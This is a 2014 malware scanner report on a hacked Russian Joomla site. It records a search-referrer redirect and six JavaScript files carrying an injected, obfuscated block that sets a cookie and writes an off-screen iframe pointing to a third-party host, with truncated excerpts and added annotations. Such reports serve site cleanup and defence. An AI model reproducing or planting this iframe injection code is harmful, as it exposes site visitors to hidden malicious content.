
Malware Scanner report for g-kirova.ru

Malicious/Suspicious/Total urls checked
6/0/16
6 pages have malicious code. See details below
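Blacklists
OK (the site is not listed by the blacklists queried at the end of this report; this reflects the blacklists only, not whether the site is clean)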
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://www.bolltec.com/media/jce/mediaplayer/license.php
2055 websites infected.

The website "g-kirova.ru" has most probably been hacked and is losing its visitors. You need to take action as soon as possible to fix the security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK


Malicious/Suspicious Redirects

Request | Server response | Status
URL: http://g-kirova.ru/
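(the scanner imitates a visitor arriving from a search engine by sending a Google search URL in the Referer header; the same URL returned 200 OK in the page scan below, which suggests the redirect is served only to such visitors)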


GET / HTTP/1.1
Host: g-kirova.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 28 Sep 2014 23:53:26 GMT
Location: http://www.bolltec.com/media/jce/mediaplayer/license.php
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
malicious

Scanned pages/files

Request | Server response | Status
http://g-kirova.ru/
200 OK
Content-Length: 78966
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js
200 OK
Content-Length: 66079
Content-Type: text/javascript
clean
http://g-kirova.ru/media/system/js/caption.js
200 OK
Content-Length: 3733
Content-Type: application/x-javascript
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
200 OK
Content-Length: 78601
Content-Type: text/javascript
clean
http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js
200 OK
Content-Length: 1851
Content-Type: application/x-javascript
malicious
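Malicious code - confirmed by antivirus engines (see below). The scanner truncates the excerpt; the visible part shows a block placed ahead of the file's original code that checks for a cookie and, when the cookie is not set, sets it and writes an iframe positioned off-screen whose source is a third-party host.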

(function(){
/**
 * Reviewer annotation (not part of the served file).
 * Case-insensitive substring search defined inside the injected block; its
 * call sites are not visible in this excerpt.
 * Both arguments are coerced to strings and lower-cased, then indexOf is
 * applied starting at f_offset.
 *
 * @param {*} f_haystack - value to search in
 * @param {*} f_needle - value to look for
 * @param {number} [f_offset] - start position passed to indexOf
 * @returns {number|boolean} index of the first match, or false when there is none
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
// A match at position 0 is returned as 0, so callers have to compare against false explicitly.
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 987 bytes are skipped ...
{
var cookie = getCookie('berlingo8ausjtt176a7');
if (cookie == undefined) {
setCookie('berlingo8ausjtt176a7', true, 260001);
document.write('<iframe'+' src'+'='+'http://fwkthtjhr.kunstdeco.com/?id=true'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>');
}
}
})();
// Reviewer annotation (not part of the served file): this line follows the injected block
// and looks like the file's original content. When jQuery is loaded, jQuery.noConflict()
// releases the $ alias and the returned jQuery reference is kept as window.jQueryNivoSlider.
if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict();

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js
200 OK
Content-Length: 8831
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Reviewer annotation (not part of the served file).
 * Case-insensitive substring search defined inside the injected block; its
 * call sites are not visible in this excerpt.
 * Both arguments are coerced to strings and lower-cased, then indexOf is
 * applied starting at f_offset.
 *
 * @param {*} f_haystack - value to search in
 * @param {*} f_needle - value to look for
 * @param {number} [f_offset] - start position passed to indexOf
 * @returns {number|boolean} index of the first match, or false when there is none
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
// A match at position 0 is returned as 0, so callers have to compare against false explicitly.
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 3162 bytes are skipped ...
ownLeft|reverse|trigger||nivoSlider|paused|click|block|manualAdvance|pauseTime|random|fade||controlNavHolder|first|bind|html|fadeIn|setInterval|live|prev|next|thumbNavWrapper|call|sliceDownRight|sliceUpRight|sliceUpDown|fold|top|defaults|stop|disableClick|data|vars|for|round|left|captionOpacity|prevNav|nextNav|directionNavHide|hide|control|rel|||hasClass|controlNavThumbs|removeClass|keyboardNav|keyCode|pauseOnHover|afterChange|beforeChange|slideshowEnd|fadeOut|floor|bottom|jpg'.split('|'),0,{}))

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/templates/theme325/scripts/maxheight.js
200 OK
Content-Length: 2106
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Reviewer annotation (not part of the served file).
 * Case-insensitive substring search defined inside the injected block; its
 * call sites are not visible in this excerpt.
 * Both arguments are coerced to strings and lower-cased, then indexOf is
 * applied starting at f_offset.
 *
 * @param {*} f_haystack - value to search in
 * @param {*} f_needle - value to look for
 * @param {number} [f_offset] - start position passed to indexOf
 * @returns {number|boolean} index of the first match, or false when there is none
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
// A match at position 0 is returned as 0, so callers have to compare against false explicitly.
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 1289 bytes are skipped ...
+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>');
}
}
})();
/**
 * Reviewer annotation (not part of the served file): this function follows the
 * injected block and appears to be the template's original code.
 * Gives every div carrying the given class the height of the tallest one.
 *
 * @param {string} classname - class name appended to the 'div.' selector
 * @returns {number} the largest getSize().size.y found, 0 when no element is visited
 */
var maxHeight = function(classname) {
var divs = document.getElements('div.' + classname);
var max = 0;
// Track the largest vertical size among the matched elements.
divs.each(function(div) {
max = Math.max(max, div.getSize().size.y);
});
// Apply that size to the whole collection at once.
divs.setStyle('height', max);
return max;
}
// Reviewer annotation (not part of the served file): on window load, maxHeight runs once
// immediately and is scheduled again through maxHeight.delay(500, ...).
// NOTE(review): the immediate call passes 'eqal' while the delayed call passes 'equal';
// possibly a typo in the template - confirm against the page markup.
window.addEvent('load', function() {
maxHeight('eqal');
maxHeight.delay(500, maxHeight, 'equal');
});

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/modules/mod_jalendar/js/jal.js
200 OK
Content-Length: 1978
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Reviewer annotation (not part of the served file).
 * Case-insensitive substring search defined inside the injected block; its
 * call sites are not visible in this excerpt.
 * Both arguments are coerced to strings and lower-cased, then indexOf is
 * applied starting at f_offset.
 *
 * @param {*} f_haystack - value to search in
 * @param {*} f_needle - value to look for
 * @param {number} [f_offset] - start position passed to indexOf
 * @returns {number|boolean} index of the first match, or false when there is none
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
// A match at position 0 is returned as 0, so callers have to compare against false explicitly.
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 1134 bytes are skipped ...
document.write('<iframe'+' src'+'='+'http://fwkthtjhr.kunstdeco.com/?id=true'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'ute;left:-1410px;top:-1430px;'+' height="125" width="145"></iframe>');
}
}
})();
/**
 * Reviewer annotation (not part of the served file): this function follows the
 * injected block and appears to be the module's original code.
 * Sends a POST request to modules/mod_jalendar/mod_jalendar.php under server_url
 * with the three values as form data; the request is configured with update: 'idcal'.
 *
 * @param {*} curmonth - value sent as the curmonth field
 * @param {*} curyear - value sent as the curyear field
 * @param {*} mid - value sent as the mid field
 */
function aj_nd(curmonth,curyear,mid)
{
// NOTE(review): the values are concatenated into the data string without URL-encoding;
// presumably they are numeric - confirm at the call sites. server_url is defined elsewhere.
new Ajax(server_url+'modules/mod_jalendar/mod_jalendar.php',{method: 'post',update: 'idcal',data:'curmonth='+curmonth+'&curyear='+curyear+'&mid='+mid}).request();
}

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/modules/mod_ppc_fastfont/js/fastfont.js
200 OK
Content-Length: 4182
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Reviewer annotation (not part of the served file).
 * Case-insensitive substring search defined inside the injected block; its
 * call sites are not visible in this excerpt.
 * Both arguments are coerced to strings and lower-cased, then indexOf is
 * applied starting at f_offset.
 *
 * @param {*} f_haystack - value to search in
 * @param {*} f_needle - value to look for
 * @param {number} [f_offset] - start position passed to indexOf
 * @returns {number|boolean} index of the first match, or false when there is none
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
// A match at position 0 is returned as 0, so callers have to compare against false explicitly.
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 2863 bytes are skipped ...
gth,c.length);
}
return null;
};

// Reviewer annotation (not part of the served file): this part follows the injected block
// and appears to be the module's original code. setUserOptions is registered as the
// window load handler.
window.onload = setUserOptions;

/**
 * Applies the stored font size once: reads the "fontSize" cookie, falls back to
 * defaultFontSize when readCookie returns a falsy value, and passes the result to
 * setFontSize. The prefsLoaded flag keeps later calls from repeating the work.
 * prefsLoaded, defaultFontSize, readCookie and setFontSize are defined outside the
 * visible excerpt.
 */
function setUserOptions(){
if(!prefsLoaded){

// cookie and currentFontSize are assigned without a declaration in the visible code;
// presumably they are declared in the skipped part - otherwise they become globals.
cookie = readCookie("fontSize");
currentFontSize = cookie ? cookie : defaultFontSize;
setFontSize(currentFontSize);

prefsLoaded = true;
}

}

// Reviewer annotation (not part of the served file): saveSettings is registered as the
// window unload handler.
window.onunload = saveSettings;

/**
 * Stores currentFontSize in the "fontSize" cookie through createCookie, passing 365 as
 * the third argument (presumably a lifetime in days - createCookie is not visible here).
 */
function saveSettings()
{
createCookie("fontSize", currentFontSize, 365);
}

Antivirus reports:

DrWeb
JS.IFrame.566

http://counter.rambler.ru/top100.jcn?2613249
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://g-kirova.ru/napisat-nam.html
200 OK
Content-Length: 57202
Content-Type: text/html
clean
http://g-kirova.ru/media/system/js/validate.js
200 OK
Content-Length: 6016
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Reviewer annotation (not part of the served file).
 * Case-insensitive substring search defined inside the injected block; its
 * call sites are not visible in this excerpt.
 * Both arguments are coerced to strings and lower-cased, then indexOf is
 * applied starting at f_offset.
 *
 * @param {*} f_haystack - value to search in
 * @param {*} f_needle - value to look for
 * @param {number} [f_offset] - start position passed to indexOf
 * @returns {number|boolean} index of the first match, or false when there is none
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
// A match at position 0 is returned as 0, so callers have to compare against false explicitly.
return index;
}
return false;
}
function batuuedpro(){
var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo
... 4306 bytes are skipped ...
tProperty('id')) {
el.labelref = label;
}
});
}
if (state == false) {
el.addClass('invalid');
if (el.labelref) {
$(el.labelref).addClass('invalid');
}
} else {
el.removeClass('invalid');
if (el.labelref) {
$(el.labelref).removeClass('invalid');
}
}
}
});
// Reviewer annotation (not part of the served file): document.formvalidator starts as null
// and is replaced by a new JFormValidator instance in the Window.onDomReady callback.
// JFormValidator is defined in the part of the file that is only partly visible above.
document.formvalidator = null;
Window.onDomReady(function(){
document.formvalidator = new JFormValidator();
});

Antivirus reports:

DrWeb
JS.IFrame.566

http://g-kirova.ru/karta-sajta.html
404 Компонент не найден
Content-Length: 1844
Content-Type: text/html
clean
http://g-kirova.ru/index.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 28 Sep 2014 23:53:35 GMT
Location: http://g-kirova.ru/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
clean
http://g-kirova.ru/test404page.js
404 Not Found
Content-Length: 3621
Content-Type: text/html
clean
http://g-kirova.ru/hosting_static_404/modernizr.js
200 OK
Content-Length: 6296
Content-Type: text/javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=g-kirova.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://g-kirova.ru/

Result: g-kirova.ru is not infected or malware details are not published yet.